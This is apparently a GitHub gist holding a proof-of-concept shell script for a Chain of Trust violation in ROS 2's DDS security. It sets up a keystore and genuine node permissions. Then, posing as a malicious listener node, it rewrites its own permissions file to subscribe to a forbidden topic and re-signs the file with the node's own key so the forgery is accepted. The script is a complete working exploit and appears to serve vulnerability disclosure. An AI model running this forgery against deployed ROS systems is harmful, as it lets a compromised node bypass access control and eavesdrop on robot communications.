Created
February 25, 2023 08:30
-
-
Save vmayoral/235c02d0b0ef85a29812eff6980ff80d to your computer and use it in GitHub Desktop.
Proof of concept of Data Distribution Service (DDS) Chain of Trust (CoT) violation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| msg () { | |
| echo | |
| : "=== $* ===" | |
| sleep 2 | |
| } | |
| . /opt/ros/foxy/setup.sh | |
| set -x | |
| msg "Creating keystore" | |
| export ROS_SECURITY_ENABLE=true | |
| export ROS_SECURITY_STRATEGY=Enforce | |
| export ROS_SECURITY_KEYSTORE=. | |
| ros2 security create_keystore . | |
| ros2 security create_key . /talker | |
| ros2 security create_key . /listener | |
| msg "Creating genuine permissions" | |
| cat >node.xml <<POLICY | |
| <?xml version="1.0" encoding="UTF-8"?> | |
| <profile> | |
| <topics publish="ALLOW"> | |
| <topic>/rosout</topic> | |
| </topics> | |
| <topics subscribe="ALLOW"> | |
| <topic>/clock</topic> | |
| </topics> | |
| <topics publish="ALLOW" subscribe="ALLOW" > | |
| <topic>/parameter_events</topic> | |
| </topics> | |
| <services reply="ALLOW" request="ALLOW" > | |
| <service>~/describe_parameters</service> | |
| <service>~/get_parameter_types</service> | |
| <service>~/get_parameters</service> | |
| <service>~/list_parameters</service> | |
| <service>~/set_parameters</service> | |
| <service>~/set_parameters_atomically</service> | |
| </services> | |
| </profile> | |
| POLICY | |
| cat >policy.xml <<POLICY | |
| <?xml version="1.0" encoding="UTF-8"?> | |
| <policy version="0.2.0" xmlns:xi="http://www.w3.org/2001/XInclude"> | |
| <enclaves> | |
| <enclave path="/talker"> | |
| <profiles> | |
| <profile ns="/" node="talker"> | |
| <xi:include href="node.xml" xpointer="xpointer(/profile/*)"/> | |
| <topics publish="ALLOW" > | |
| <topic>chatter</topic> | |
| </topics> | |
| </profile> | |
| </profiles> | |
| </enclave> | |
| <enclave path="/listener"> | |
| <profiles> | |
| <profile ns="/" node="listener"> | |
| <xi:include href="node.xml" xpointer="xpointer(/profile/*)"/> | |
| <topics subscribe="ALLOW"> | |
| <topic>something_else</topic> | |
| </topics> | |
| </profile> | |
| </profiles> | |
| </enclave> | |
| </enclaves> | |
| </policy> | |
| POLICY | |
| cat >launch.xml <<LAUNCH | |
| <launch> | |
| <node pkg="demo_nodes_cpp" exec="talker"> | |
| <env name="ROS_SECURITY_ENCLAVE_OVERRIDE" value="/talker"/> | |
| </node> | |
| <node pkg="demo_nodes_py" exec="listener"> | |
| <env name="ROS_SECURITY_ENCLAVE_OVERRIDE" value="/listener"/> | |
| </node> | |
| </launch> | |
| LAUNCH | |
| ros2 security create_permission . /talker policy.xml | |
| ros2 security create_permission . /listener policy.xml | |
| msg "Running nodes with correct permissions" | |
| ros2 launch launch.xml & | |
| sleep 10 && kill $! | |
| msg "Creating malicious permissions document" | |
| # For this step we are acting as a malicious node /listener. We do not | |
| # access any files outside the enclaves/listener directory. | |
| sed -i -e's!rt/something_else!rt/chatter!' enclaves/listener/permissions.xml | |
| openssl smime -sign -text -in enclaves/listener/permissions.xml \ | |
| -out enclaves/listener/permissions.p7s \ | |
| -signer enclaves/listener/cert.pem \ | |
| -inkey enclaves/listener/key.pem | |
| msg "Running nodes with malicious permissions" | |
| ros2 launch launch.xml & | |
| sleep 10 && kill $! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment